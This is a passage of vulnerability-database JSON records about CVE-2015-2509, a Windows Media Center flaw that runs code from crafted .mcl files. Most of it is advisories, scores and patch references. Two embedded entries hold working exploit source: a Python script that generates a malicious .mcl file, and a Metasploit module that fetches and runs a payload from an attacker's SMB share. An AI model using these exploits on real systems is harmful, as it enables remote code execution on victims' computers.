2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-01T22:52:39", "rev": 2}, "vulnersScore": 7.5}, "kb": "KB3087918", "msrc": "MS15-100", "mscve": "", "msfamily": "", "msplatform": "", "msproducts": ["14478", "14113", "11721", "15514", "11728", "11740", "11733", "11719", "17651", "17654", "16797", "14496", "14490", "14501", "16854", "17657", "14503", "16722"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "b2012b15-7770-3165-b934-5b004ee86f67", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "6f18bf60-d0f1-8298-413b-89f6e8170528", "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "84f238c8-9f55-203c-9eb5-a2efcdf27ab1", "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "244077f3-69a9-7534-f748-4cfd26b20c3b", "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "fd3a2888-0af1-3691-5303-bc85b4302e62", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "948aa232-06db-7d04-b975-a55f6d10d3a3", "9087adda-9d1d-0ba1-1b0b-ad434f940308", "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f"], "supportAreaPathNodes": [{"id": "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "name": "Windows 8.1 Pro", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "84f238c8-9f55-203c-9eb5-a2efcdf27ab1", "name": "Windows 8 Pro", "parent": "31feb23d-f680-e1e0-1f97-ef7b00c80cdf", "tree": [], "type": "productversion"}, {"id": "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "name": "Windows 7 Home Basic", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "name": "Windows 7 Ultimate", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "b2012b15-7770-3165-b934-5b004ee86f67", "name": "Windows 8.1", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "name": "Windows 7 Enterprise", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "244077f3-69a9-7534-f748-4cfd26b20c3b", "name": "Windows 8 Enterprise", "parent": "31feb23d-f680-e1e0-1f97-ef7b00c80cdf", "tree": [], "type": "productversion"}, {"id": "6f18bf60-d0f1-8298-413b-89f6e8170528", "name": "Windows 7 Professional", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "948aa232-06db-7d04-b975-a55f6d10d3a3", "name": "Windows 8", "parent": "31feb23d-f680-e1e0-1f97-ef7b00c80cdf", "tree": [], "type": "productversion"}, {"id": "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "name": "Windows 7 Home Premium", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "b905caa1-d413-c90c-bed3-20aead901092", "name": "Windows 8.1", "parent": "1267d68d-d9f7-6020-0726-166b153ccbeb", "tree": [], "type": "productname"}, {"id": "1267d68d-d9f7-6020-0726-166b153ccbeb", "name": "Windows", "tree": [], "type": "productfamily"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}], "superseeds": [], "parentseeds": ["KB4530702", "KB4577066", "KB4525243", "KB4577051", "KB3150220", "KB4534297", "KB4530734", "KB4561666", "KB4534310", "KB4571729", "KB4550964", "KB4537821", "KB4586845", "KB4541509", "KB4565524", "KB3108669", "KB4556846", "KB4524156", "KB4519976", "KB4520005", "KB4580347", "KB4580345", "KB4556836", "KB4550961", "KB4586827", "KB4561643", "KB4540688", "KB4565541", "KB4571703", "KB4525235", "KB4592471", "KB4524157", "KB4592484", "KB4537820"], "msimpact": "Remote Code Execution", "msseverity": "Important", "scheme": null}

{"cve": [{"lastseen": "2021-02-02T06:21:23", "description": "Windows Media Center in Microsoft Windows Vista SP2, Windows 7 SP1, Windows 8, and Windows 8.1 allows user-assisted remote attackers to execute arbitrary code via a crafted Media Center link (mcl) file, aka \"Windows Media Center RCE Vulnerability.\"", "edition": 4, "cvss3": {}, "published": "2015-09-09T00:59:00", "title": "CVE-2015-2509", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2509"], "modified": "2019-05-15T18:40:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-2509", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2509", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-11T18:48:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2509"], "description": "### Description\n\nMicrosoft Windows Media Center is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows Media Center \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful attacks, never handle or open files from unknown sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs this issue may be cause by a memory-corruption error, consider various memory-protection schemes (such as nonexecutable and randomly mapped memory segments) that may hinder an attacker's ability to exploit memory-corruption vulnerabilities. Host-based intrusion-prevention systems may also help prevent exploits.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2015-09-08T00:00:00", "published": "2015-09-08T00:00:00", "id": "SMNTC-76594", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/76594", "type": "symantec", "title": "Microsoft Windows Media Center CVE-2015-2509 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "description": "Added: 09/15/2015 \nCVE: [CVE-2015-2509](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509>) \n\n\n### Background\n\n[Windows Media Center](<http://windows.microsoft.com/en-us/windows/products/windows-media-center>) is software for watching DVDs and TV channels on Windows systems. \n\n### Problem\n\nA vulnerability in Windows Media Center could allow command execution when a user opens an `**.mcl**` file which references an executable file supplied by an attacker. \n\n### Resolution\n\nApply the update referenced in Microsoft Security Bulletin [MS15-100](<https://technet.microsoft.com/library/security/ms15-100>). \n\n### References\n\n<https://technet.microsoft.com/library/security/ms15-100> \n\n\n### Limitations\n\nExploit works on Microsoft Windows Vista through 8.1. \n\nOne of the programs `**smbclient**` or `**mount_smbfs**` must be available on the SAINT host. \n\nAn SMB share which is anonymously readable by the target computer, and a user name and password with write access to that share, must be specified. \n\nThe vulnerable user must save the `**.mcl**` file via right-click menu. The vulnerability is triggered when the file is opened by Windows Media Center. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2015-09-15T00:00:00", "published": "2015-09-15T00:00:00", "id": "SAINT:43FDDF5D8ADC72CD1D2E623A21D14E03", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_media_center_exec", "title": "Windows Media Center command execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "description": "Added: 09/15/2015 \nCVE: [CVE-2015-2509](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509>) \n\n\n### Background\n\n[Windows Media Center](<http://windows.microsoft.com/en-us/windows/products/windows-media-center>) is software for watching DVDs and TV channels on Windows systems. \n\n### Problem\n\nA vulnerability in Windows Media Center could allow command execution when a user opens an `**.mcl**` file which references an executable file supplied by an attacker. \n\n### Resolution\n\nApply the update referenced in Microsoft Security Bulletin [MS15-100](<https://technet.microsoft.com/library/security/ms15-100>). \n\n### References\n\n<https://technet.microsoft.com/library/security/ms15-100> \n\n\n### Limitations\n\nExploit works on Microsoft Windows Vista through 8.1. \n\nOne of the programs `**smbclient**` or `**mount_smbfs**` must be available on the SAINT host. \n\nAn SMB share which is anonymously readable by the target computer, and a user name and password with write access to that share, must be specified. \n\nThe vulnerable user must save the `**.mcl**` file via right-click menu. The vulnerability is triggered when the file is opened by Windows Media Center. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2015-09-15T00:00:00", "published": "2015-09-15T00:00:00", "id": "SAINT:4D0568C2D53113C0B8239CE4375D3176", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_media_center_exec", "type": "saint", "title": "Windows Media Center command execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "edition": 2, "description": "Added: 09/15/2015 \nCVE: [CVE-2015-2509](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509>) \n\n\n### Background\n\n[Windows Media Center](<http://windows.microsoft.com/en-us/windows/products/windows-media-center>) is software for watching DVDs and TV channels on Windows systems. \n\n### Problem\n\nA vulnerability in Windows Media Center could allow command execution when a user opens an `**.mcl**` file which references an executable file supplied by an attacker. \n\n### Resolution\n\nApply the update referenced in Microsoft Security Bulletin [MS15-100](<https://technet.microsoft.com/library/security/ms15-100>). \n\n### References\n\n<https://technet.microsoft.com/library/security/ms15-100> \n\n\n### Limitations\n\nExploit works on Microsoft Windows Vista through 8.1. \n\nOne of the programs `**smbclient**` or `**mount_smbfs**` must be available on the SAINT host. \n\nAn SMB share which is anonymously readable by the target computer, and a user name and password with write access to that share, must be specified. \n\nThe vulnerable user must save the `**.mcl**` file via right-click menu. The vulnerability is triggered when the file is opened by Windows Media Center. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2015-09-15T00:00:00", "published": "2015-09-15T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_media_center_exec", "id": "SAINT:4CA1F529427C102E6F0EC6756A18AFB9", "title": "Windows Media Center command execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-06T03:28:36", "edition": 2, "description": "Exploit for windows platform in category remote exploits", "published": "2015-09-12T00:00:00", "type": "zdt", "title": "Windows Media Center - Command Execution (MS15-100) Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "modified": "2015-09-12T00:00:00", "id": "1337DAY-ID-24239", "href": "https://0day.today/exploit/description/24239", "sourceData": "# Title: MS15-100 Windows Media Center Command Execution\r\n# Date : 11/09/2015\r\n# Author: R-73eN\r\n# Software: Windows Media Center\r\n# Tested : Windows 7 Ultimate\r\n# CVE : 2015-2509\r\n \r\n \r\nbanner = \"\"\r\nbanner += \" ___ __ ____ _ _ \\n\"\r\nbanner +=\" |_ _|_ __ / _| ___ / ___| ___ _ __ / \\ | | \\n\"\r\nbanner +=\" | || '_ \\| |_ / _ \\| | _ / _ \\ '_ \\ / _ \\ | | \\n\"\r\nbanner +=\" | || | | | _| (_) | |_| | __/ | | | / ___ \\| |___ \\n\"\r\nbanner +=\" |___|_| |_|_| \\___/ \\____|\\___|_| |_| /_/ \\_\\_____|\\n\\n\"\r\nprint banner\r\n \r\ncommand = \"calc.exe\"\r\nevil = '<application run=\"' + command + '\"/>'\r\nf = open(\"Music.mcl\",\"w\")\r\nf.write(evil)\r\nf.close()\r\nprint \"\\n[+] Music.mcl generated . . . [+]\"\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24239"}, {"lastseen": "2018-03-19T13:13:50", "description": "This Metasploit module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.", "edition": 2, "published": "2015-09-16T00:00:00", "type": "zdt", "title": "Microsoft Windows Media Center MCL MS15-100 Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "modified": "2015-09-16T00:00:00", "id": "1337DAY-ID-24254", "href": "https://0day.today/exploit/description/24254", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::SMB::Server::Share\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS15-100 Microsoft Windows Media Center MCL Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Windows Media Center. By supplying\r\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\r\n which can result in arbitrary code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'sinn3r',\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-2509'],\r\n ['MSB', 'MS15-100']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'false'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n ['Windows', {}],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 8 2015\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),\r\n OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])\r\n ], self.class)\r\n \r\n deregister_options('FILE_CONTENTS')\r\n end\r\n \r\n def generate_mcl\r\n %Q|<application run=\"#{unc}\" />|\r\n end\r\n \r\n def primer\r\n self.file_contents = generate_payload_exe\r\n print_status(\"Malicious executable at #{unc}...\")\r\n \r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n mcl = generate_mcl\r\n file_create(mcl)\r\n end\r\n \r\nend\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24254"}], "kaspersky": [{"lastseen": "2018-02-19T21:29:14", "bulletinFamily": "info", "cvelist": ["CVE-2015-2509"], "edition": 5, "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n09/08/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nLack of *.mcl (Media Center Link) files handling restrictions was found in Windows Media Center. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed mcl file.\n\n### *Affected products*:\nWindows Media Center\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS15-100](<https://technet.microsoft.com/en-us/library/security/MS15-100>) \n\n\n### *Impacts*:\nACE \n\n### *CVE-IDS*:\n[CVE-2015-2509](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509>) \n\n\n### *Microsoft official advisories*:\n[MS15-100](<https://technet.microsoft.com/en-us/library/security/MS15-100>)\n\n### *KB list*:\n[3087918](<http://support.microsoft.com/kb/3087918>)", "modified": "2015-09-14T00:00:00", "published": "2015-09-08T00:00:00", "id": "KLA10660", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10660", "title": "\r KLA10660Code execution vulnerability in Microsoft Windows Media Center\t\t\t ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-09-02T11:53:38", "bulletinFamily": "info", "cvelist": ["CVE-2015-2514", "CVE-2015-2485", "CVE-2015-2508", "CVE-2015-2513", "CVE-2015-2486", "CVE-2015-2518", "CVE-2015-2517", "CVE-2015-2528", "CVE-2015-2506", "CVE-2015-2525", "CVE-2015-2516", "CVE-2015-2507", "CVE-2015-2524", "CVE-2015-2494", "CVE-2015-2509", "CVE-2015-2530", "CVE-2015-2510", "CVE-2015-2519", "CVE-2015-2512", "CVE-2015-2546", "CVE-2015-2534", "CVE-2015-2542", "CVE-2015-2511", "CVE-2015-2535", "CVE-2015-2529", "CVE-2015-2527"], "description": "### *Detect date*:\n09/08/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows and related products. Malicious users can exploit these vulnerabilities to cause denial of service, bypass security restrictions, gain privileges or execute arbitrary code.\n\n### *Affected products*:\nWindows 10 \nWindows Server 2008 Service Pack 2 \nWindows Server 2008 R2 Service Pack 1 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows Vista Service Pack 2 \nWindows 7 Service Pack 1 \nWindows 8 \nWindows 8.1 \nWindows RT \nWindows RT 8.1 \nOffice 2007 Service Pack 3 \nOffice 2010 Service Pack 2 \nLync 2013 Service Pack 1 \nLync Basic 2013 Service Pack 1 \nLync 2010 \nLync 2010 Attendee \nLive Meeting 2007 Console \nWindows Media Center\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2015-2494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2494>) \n[CVE-2015-2542](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2542>) \n[CVE-2015-2486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2486>) \n[CVE-2015-2485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2485>) \n[CVE-2015-2546](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2546>) \n[CVE-2015-2535](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2535>) \n[CVE-2015-2534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2534>) \n[CVE-2015-2530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2530>) \n[CVE-2015-2529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2529>) \n[CVE-2015-2528](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2528>) \n[CVE-2015-2527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2527>) \n[CVE-2015-2525](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2525>) \n[CVE-2015-2524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2524>) \n[CVE-2015-2509](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2509>) \n[CVE-2015-2517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2517>) \n[CVE-2015-2516](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2516>) \n[CVE-2015-2514](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2514>) \n[CVE-2015-2513](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2513>) \n[CVE-2015-2512](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2512>) \n[CVE-2015-2511](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2511>) \n[CVE-2015-2510](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2510>) \n[CVE-2015-2519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2519>) \n[CVE-2015-2518](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2518>) \n[CVE-2015-2506](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2506>) \n[CVE-2015-2507](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2507>) \n[CVE-2015-2508](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2508>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Lync](<https://threats.kaspersky.com/en/product/Microsoft-Lync/>)\n\n### *CVE-IDS*:\n[CVE-2015-2494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2494>)9.3Critical \n[CVE-2015-2542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2542>)9.3Critical \n[CVE-2015-2486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2486>)9.3Critical \n[CVE-2015-2485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2485>)9.3Critical \n[CVE-2015-2546](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2546>)7.2High \n[CVE-2015-2535](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2535>)4.0Warning \n[CVE-2015-2534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2534>)1.9Warning \n[CVE-2015-2530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2530>)9.3Critical \n[CVE-2015-2529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2529>)2.1Warning \n[CVE-2015-2528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2528>)7.2High \n[CVE-2015-2527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2527>)7.2High \n[CVE-2015-2525](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2525>)7.2High \n[CVE-2015-2524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2524>)7.2High \n[CVE-2015-2509](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509>)9.3Critical \n[CVE-2015-2517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2517>)7.2High \n[CVE-2015-2516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2516>)4.3Warning \n[CVE-2015-2514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2514>)9.3Critical \n[CVE-2015-2513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2513>)9.3Critical \n[CVE-2015-2512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2512>)7.2High \n[CVE-2015-2511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2511>)7.2High \n[CVE-2015-2510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2510>)9.3Critical \n[CVE-2015-2519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2519>)9.3Critical \n[CVE-2015-2518](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2518>)7.2High \n[CVE-2015-2506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2506>)9.3Critical \n[CVE-2015-2507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2507>)7.2High \n[CVE-2015-2508](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2508>)7.2High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3089657](<http://support.microsoft.com/kb/3089657>) \n[3087135](<http://support.microsoft.com/kb/3087135>) \n[3081088](<http://support.microsoft.com/kb/3081088>) \n[3085500](<http://support.microsoft.com/kb/3085500>) \n[3084135](<http://support.microsoft.com/kb/3084135>) \n[3087088](<http://support.microsoft.com/kb/3087088>) \n[3072595](<http://support.microsoft.com/kb/3072595>) \n[3081091](<http://support.microsoft.com/kb/3081091>) \n[3081087](<http://support.microsoft.com/kb/3081087>) \n[3081090](<http://support.microsoft.com/kb/3081090>) \n[3081455](<http://support.microsoft.com/kb/3081455>) \n[3085546](<http://support.microsoft.com/kb/3085546>) \n[3085529](<http://support.microsoft.com/kb/3085529>) \n[3089656](<http://support.microsoft.com/kb/3089656>) \n[3069114](<http://support.microsoft.com/kb/3069114>) \n[3089669](<http://support.microsoft.com/kb/3089669>) \n[3082089](<http://support.microsoft.com/kb/3082089>) \n[3089665](<http://support.microsoft.com/kb/3089665>) \n[3091287](<http://support.microsoft.com/kb/3091287>) \n[3087039](<http://support.microsoft.com/kb/3087039>) \n[3081089](<http://support.microsoft.com/kb/3081089>) \n[3087918](<http://support.microsoft.com/kb/3087918>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 42, "modified": "2020-06-18T00:00:00", "published": "2015-09-08T00:00:00", "id": "KLA10656", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10656", "title": "\r KLA10656Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:50:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2509"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS15-100.", "modified": "2020-06-09T00:00:00", "published": "2015-09-09T00:00:00", "id": "OPENVAS:1361412562310805737", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805737", "type": "openvas", "title": 